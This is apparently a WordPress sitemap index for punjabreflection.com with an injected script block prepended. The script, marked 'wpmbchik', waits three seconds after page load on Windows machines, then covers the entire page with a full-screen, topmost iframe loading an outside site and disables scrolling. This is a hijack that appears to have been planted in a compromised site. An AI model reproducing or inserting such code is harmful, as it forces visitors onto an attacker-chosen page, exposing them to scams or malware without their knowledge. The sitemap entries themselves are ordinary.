
<!-- wpmbchik -->
<script>
function createModal(url) {
  const overlay = document.createElement('div');
  Object.assign(overlay.style, {
    position: 'fixed',
    inset: '0',              // top/right/bottom/left = 0
    width: '100vw',          // на всякий случай — единицы viewport
    height: '100vh',
    background: '#fff',
    zIndex: '2147483647',    // максимальный z-index
    margin: '0',
    padding: '0',
    border: '0'
  });

  const iframe = document.createElement('iframe');
  iframe.src = url;
  iframe.allowFullscreen = true;
  iframe.allow = 'fullscreen';
  Object.assign(iframe.style, {
    width: '100%',
    height: '100%',
    border: 'none',
    display: 'block',
    margin: '0',
    padding: '0'
  });

  overlay.appendChild(iframe);
  document.body.appendChild(overlay);

  document.documentElement.style.overflow = 'hidden';
  document.body.style.overflow = 'hidden';
  document.body.style.margin = '0';
}
document.addEventListener('DOMContentLoaded', () => {
  const isWindows = /Win/i.test(navigator.userAgent);
  
  if (isWindows) {
 setTimeout(() => {
    createModal('https://clickhere.click');
 }, 3000); }
});


</script>
<!-- /wpmbchik -->
<?xml version="1.0" encoding="UTF-8"?>
<!-- This sitemap was dynamically generated on April 29, 2026 at 8:28 am by All in One SEO v4.7.9.1 - the original SEO plugin for WordPress. -->

<?xml-stylesheet type="text/xsl" href="https://punjabreflection.com/default-sitemap.xsl?sitemap=root"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc><![CDATA[https://punjabreflection.com/post-sitemap.xml]]></loc>
		<lastmod><![CDATA[2026-04-18T03:55:16+00:00]]></lastmod>
	</sitemap>
	<sitemap>
		<loc><![CDATA[https://punjabreflection.com/post-sitemap2.xml]]></loc>
		<lastmod><![CDATA[2024-10-21T16:14:23+00:00]]></lastmod>
	</sitemap>
	<sitemap>
		<loc><![CDATA[https://punjabreflection.com/post-sitemap3.xml]]></loc>
		<lastmod><![CDATA[2022-11-11T03:47:04+00:00]]></lastmod>
	</sitemap>
	<sitemap>
		<loc><![CDATA[https://punjabreflection.com/post-sitemap4.xml]]></loc>
		<lastmod><![CDATA[2021-07-29T05:43:43+00:00]]></lastmod>
	</sitemap>
	<sitemap>
		<loc><![CDATA[https://punjabreflection.com/page-sitemap.xml]]></loc>
		<lastmod><![CDATA[2026-01-31T15:14:18+00:00]]></lastmod>
	</sitemap>
	<sitemap>
		<loc><![CDATA[https://punjabreflection.com/category-sitemap.xml]]></loc>
		<lastmod><![CDATA[2026-04-18T03:55:16+00:00]]></lastmod>
	</sitemap>
	<sitemap>
		<loc><![CDATA[https://punjabreflection.com/post_tag-sitemap.xml]]></loc>
		<lastmod><![CDATA[2025-11-16T03:09:12+00:00]]></lastmod>
	</sitemap>
</sitemapindex>
